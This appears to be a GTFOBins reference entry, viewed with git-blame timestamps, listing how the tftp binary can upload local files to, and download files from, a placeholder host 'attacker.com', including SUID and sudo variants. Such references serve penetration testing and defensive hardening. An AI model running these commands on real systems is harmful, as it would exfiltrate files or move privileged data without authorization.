GTFOBins.github.io/_gtfobins/tftp.md

28 lines
644 B
Markdown
Raw Normal View History

2018-05-21 19:14:41 +00:00
---
functions:
upload:
2018-07-16 13:01:50 +00:00
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
put file_to_send
2018-05-21 19:14:41 +00:00
download:
2018-07-16 13:01:50 +00:00
- description: Fetch a remote file from a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
get file_to_get
suid-enabled:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
./tftp $RHOST
put file_to_send
sudo-enabled:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
sudo -E tftp $RHOST
put file_to_send
2018-05-24 23:10:39 +00:00
---